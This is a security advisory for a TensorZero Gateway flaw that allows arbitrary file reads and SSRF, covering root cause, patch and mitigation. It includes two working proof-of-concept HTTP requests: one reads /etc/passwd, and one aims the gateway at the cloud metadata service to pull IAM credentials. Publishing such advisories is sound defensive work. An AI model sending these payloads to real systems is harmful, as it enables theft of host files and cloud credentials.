CVE-2026-54457: TensorZero Gateway Arbitrary File Read and SSRF
The TensorZero Gateway lets any caller override its object storage backend through a single API parameter, letting attackers read files off the server or pivot to internal cloud services.
The problem
The `/internal/object_storage` endpoint accepts a caller-supplied `storage_path` JSON field that fully overrides the gateway's configured `[object_storage]` backend at request time. No validation was performed to ensure the supplied backend matched the server's own configuration.
An attacker with network access to the gateway can send a `filesystem` storage type pointing at any path on the host, reading sensitive files such as credentials or config. They can also send an `s3_compatible` storage type with an attacker-chosen endpoint URL, coercing the gateway into making outbound HTTP requests to internal addresses, including cloud metadata services.
Both attacks require only the ability to reach the endpoint; authentication is optional per deployment.
Proof of concept
A working proof-of-concept for CVE-2026-54457 in tensorzero, with the exact payload below.
# Attack 1: Arbitrary file read via filesystem storage type
POST /internal/object_storage HTTP/1.1
Host: tensorzero-gateway:3000
Content-Type: application/json
{
"storage_path": {
"type": "filesystem",
"path": "/etc/passwd"
}
}
---
# Attack 2: SSRF via s3_compatible storage type (targets cloud metadata)
POST /internal/object_storage HTTP/1.1
Host: tensorzero-gateway:3000
Content-Type: application/json
{
"storage_path": {
"type": "s3_compatible",
"endpoint": "http://169.254.169.254/latest/meta-data/",
"bucket": "x",
"key": "iam/security-credentials/"
}
}The root cause is that the endpoint deserialised the caller-supplied `storage_path` directly into a storage backend configuration struct, then instantiated a live storage client from it, with no check against the server's own configuration. This is a classic user-controlled backend instantiation pattern (CWE-552 for file access, CWE-918 for SSRF).
The patch (commit `0abbc838`, PR #7527) removes the ability to dynamically specify a storage backend in the request body entirely. The endpoint now uses only the storage configuration that was loaded at gateway startup, so caller input can never override the backend type or endpoint URL.
The fix
Upgrade tensorzero to version 2026.6.0 or later. If an immediate upgrade is not possible, block external access to the `/internal/object_storage` endpoint at the network or reverse-proxy layer as an interim workaround.
Related research
- high · 7.1CVE-2026-55787CVE-2026-55787: flyto-core SSRF Guard Bypass via IPv6 Transition Addresses
- CRITICAL · 9.9CVE-2026-55166CVE-2026-55166: Lemur ACME SSRF + Creator IDOR leads to AWS IAM and PKI key compromise
- high · 7.5CVE-2026-50271CVE-2026-50271: ddtrace Uncontrolled Resource Consumption via W3C Baggage Header Parsing
- high · 8.4CVE-2026-54447CVE-2026-54447: garminconnect World-Readable OAuth Token File